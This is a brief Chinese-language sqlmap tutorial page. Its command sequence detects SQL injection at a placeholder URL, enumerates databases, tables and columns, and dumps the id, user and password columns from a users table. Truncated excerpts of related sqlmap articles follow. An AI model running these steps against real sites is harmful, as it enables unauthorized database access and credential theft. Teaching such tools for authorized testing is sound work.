-u 檢測存在可利用漏洞
–dbs 獲取所有庫
–current-db 列出當前資料庫
-d 庫名 --tables 查詢此庫中存在的表
-d 庫名 -t 表名 --columns 列出表中的所有列
-d 庫名 -t 表名 -c 列名1,列名2 --dump 匯出列中的所有資料
sqlmap.py -u "url"sqlmap.py -u "url" --dbssqlmap.py -u "url" --current-dbsqlmap.py -u "url" -d security --tablessqlmap.py -u "url" -d security -t users --columnssqlmap.py -u "url" -d security -t users -c id,user,password --dumpsqlmap簡單的使用步驟
sqlmap用於 sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。注意 sqlmap只是用來檢測和利用sql注入點的,使用前請先使用掃瞄工具掃出sql注入點。1 檢測注入 get注入 sqlmap u 預設使用level1檢測全部資料庫型別 sqlmap u ...
sqlmap的簡單使用,引數
查詢sqlmap的位置 locate sqlmap sqlmap.py位置 usr share sqlmap sqlmap.py python sqlmap.py 呼叫python 程式解析sqlmap.py sqlmap入口程式 配置檔案 etc sqlmap sqlmap.conf 查詢記錄 c...
sqlmap簡單原理及使用
檢測注入 基本格式 sqlmap u 預設使用level1檢測全部資料庫型別 sqlmap u dbms mysql level 3 指定資料庫型別為mysql,級別為3 共5級,級別越高,檢測越全面 跟隨302跳轉 當注入頁面錯誤的時候,自動跳轉到另乙個頁面的時候需要跟隨302,當注入錯誤的時候,...